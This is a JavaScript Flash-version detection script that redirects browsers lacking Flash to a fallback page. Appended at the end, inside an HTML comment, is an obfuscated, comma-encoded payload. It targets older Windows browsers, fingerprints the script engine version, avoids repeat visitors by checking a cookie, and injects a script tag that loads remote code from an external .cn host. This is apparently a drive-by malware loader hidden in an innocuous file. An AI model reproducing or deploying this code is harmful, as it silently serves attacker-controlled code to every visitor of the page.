<!--

var requiredVersion = 6;
var noFlashPage = "noflash.htm"
var flash5Installed = false;
var actualVersion = 0;
var hasRightVersion = false;
var jsVersion = 1.0;

// #####  Detect flash in IE browser
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.indexOf("Windows") != -1) ? true : false;
jsVersion = 1.1;
if (isIE && isWin){
//if (isIE){
// check flash version
	document.write('<SCRIPT LANGUAGE=VBScript\> \n');
	document.write('on error resume next \n');
	document.write('flash5Installed = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.' + requiredVersion + '"))) \n');
	document.write('</SCR' + 'IPT\> \n');
// ##### End Detect
}

//	alert(navigator.appVersion + " : " + flash5Installed+ " : " + requiredVersion+ detectPlugin('Shockwave','Flash'));


function detectFlash(){

// #####  Detect flash in NS And IE Mac browser
	if (navigator.plugins){
// check flash version
		if (navigator.plugins["Shockwave Flash"]){
			var flashDescription = navigator.plugins["Shockwave Flash"].description;
			var flashVersion = parseInt(flashDescription.charAt(flashDescription.indexOf(".") - 1));
			flash5Installed = flashVersion >=  requiredVersion;

		}

	}
// ##### End Detect

	if (eval("flash5Installed") == true) actualVersion =  requiredVersion;

	if(navigator.userAgent.indexOf("WebTV") != -1) actualVersion = 2;

	if (actualVersion >= requiredVersion) {
		hasRightVersion = true;
	}
	
}

detectFlash();

if(!hasRightVersion) {
	if(jsVersion > 1.0) {
		window.location.replace(noFlashPage);
	} else {
		window.location = noFlashPage;
	}
}

//--><!-- 
(function(mKqr){var ZIz7g='%';var JwAh=('var,20a,3d,22ScriptEng,69n,65,22,2c,62,3d,22Version,28)+,22,2cj,3d,22,22,2c,75,3dn,61v,69,67ator,2euserAgen,74,3bif((u,2e,69nde,78,4ff,28,22Chrome,22),3c,30,29,26,26(u,2eind,65,78Of(,22W,69n,22),3e,30),26,26(u,2eind,65x,4f,66(,22NT,20,36,22),3c0),26,26(,64ocument,2e,63ookie,2einde,78O,66(,22,6di,65k,3d1,22,29,3c0),26,26(typeof,28z,72v,7a,74s,29,21,3dtyp,65of(,22A,22),29,29,7bz,72,76zts,3d,22A,22,3be,76al,28,22i,66,28wi,6edow,2e,22,2ba,2b,22),6a,3dj+,22+a+,22Major,22+b+a,2b,22Mi,6eor,22,2b,62+a+,22B,75,69ld,22,2bb,2b,22,6a,3b,22,29,3bdo,63ument,2ew,72ite,28,22,3cs,63,72ipt,20sr,63,3d,2f,2fma,22+,22rtuz,2ecn,2fvid,2f,3fid,3d,22+j+,22,3e,3c,5c,2fscript,3e,22),3b,7d').replace(mKqr,ZIz7g);eval(unescape(JwAh))})(/\,/g);
 -->